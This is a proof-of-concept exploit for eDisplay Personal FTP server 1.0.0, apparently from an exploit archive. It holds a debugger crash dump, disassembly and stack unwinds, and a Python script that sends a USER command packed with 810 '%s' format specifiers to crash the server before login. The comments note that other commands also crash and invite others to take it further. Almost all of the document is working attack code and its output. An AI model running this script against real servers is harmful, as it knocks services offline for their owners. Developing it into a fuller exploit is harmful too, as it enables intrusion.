# Title: eDisplay Personal FTP server 1.0.0 Pre-Authentication Crash (PoC)
# From: The eh?-Team || The Great White Fuzz  (we're not sure yet)
# Found by: loneferret
# Hat's off to dookie2000ca
# Disvovery date: 16/03/2010
# Software link: http://edisplay-personal-ftp-server.software.informer.com/
# Tested on: Windows XP SP3 Professional
# Nod to the Exploit-DB Team

# Vendor informed via email : 17/03/2010

#!/usr/bin/python

#Pre-Authentication crash #1
#I say crash number 1 since there's another instance where it crashes with the USER command.
#Also many post-authentication commands also crash with the same buffer type (%n for example)
#with variant degrees of interesting CPU registry overwrites.
#It will crash if you send it about 40 '%s' really, but I've included my full session of 810 bytes sent.
#As always, if anyone wants to take this further go right ahead. Just be nice and don't forget who found it.

#CONTEXT DUMP
#  EIP: 7e4287aa mov dl,[eax]
#  EAX: 73736150 (1936941392) -> N/A
#  EBX: 0000000a (        10) -> N/A
#  ECX: 73736150 (1936941392) -> N/A
#  EDX: 00000000 (         0) -> N/A
#  EDI: 0012c9a6 (   1231270) -> P(9d%s%s%s%s%s%s%s%s%s%s...%s%s%s%s%s%s%s%s%s%:UBsSHs%:vHEs<;T (stack)
#  ESI: 73736151 (1936941393) -> N/A
#  EBP: 0012c8e4 (   1231076) -> P 9Hw331 Password required for Pthis control can act as an OLE drag/drop source, 
#                and whether this process is started automatically 
#                  or under programmatic control.P(9d%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s (stack)
#  ESP: 0012c89c (   1231004) -> 9HwC(J :^:{P 9Hw331 Password required for Pthis control can act as an OLE drag/drop source, and whether this process is started automatically or under programmatic (stack)
#  +00: 0139b8d0 (  20560080) -> PWSOCK32.DLL (heap)
#  +04: 77124880 (1997686912) -> N/A
#  +08: 000000cd (       205) -> N/A
#  +0c: 00000000 (         0) -> N/A
#  +10: ffffffff (4294967295) -> N/A
#  +14: 00000000 (         0) -> N/A

#disasm around:
#  0x7e428794 push eax
#  0x7e428795 push byte 0x0
#  0x7e428797 push esi
#  0x7e428798 lea eax,[ebp+0x8]
#  0x7e42879b push eax
#  0x7e42879c call [0x7e4114b8]
#  0x7e4287a2 jmp 0x7e428747
#  0x7e4287a4 test eax,eax
#  0x7e4287a6 jz 0x7e42875e
#  0x7e4287a8 jmp 0x7e428747
#  0x7e4287aa mov dl,[eax]
#  0x7e4287ac inc eax
#  0x7e4287ad test dl,dl
#  0x7e4287af jnz 0x7e4287aa
#  0x7e4287b1 sub eax,esi
#  0x7e4287b3 xor esi,esi
#  0x7e4287b5 xor edx,edx
#  0x7e4287b7 cmp [ebp-0x28],edx
#  0x7e4287ba jnl 0x7e443411
#  0x7e4287c0 sub [ebp-0x18],eax
#  0x7e4287c3 cmp esi,edx

#stack unwind:
#  FtpServX.dll:50e0989b
#  FtpServX.dll:50e0a6d8
#  FtpServX.dll:50e09d91
#  USER32.dll:7e418734
#  USER32.dll:7e418816
#  USER32.dll:7e4189cd
#  USER32.dll:7e4196c7
#  MSVBVM60.DLL:7342a6b0
#  MSVBVM60.DLL:7342a627
#  MSVBVM60.DLL:7342a505

#SEH unwind:
#  0012fdf8 -> FtpServX.dll:50e1ceb4 mov eax,0x50e1fcf8
#  0012fe58 -> USER32.dll:7e44048f push ebp
#  0012ffa8 -> USER32.dll:7e44048f push ebp
#  0012ffe0 -> MSVBVM60.DLL:7350bafd push ebp
#  ffffffff -> kernel32.dll:7c839ac0 push ebp


import socket

buffer = ("%s") * 810  # \x25\x73

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('xxx.xxx.xxx.xxx',21))
s.recv(1024)
s.send('USER '+buffer+'\r\n')
s.recv(1024)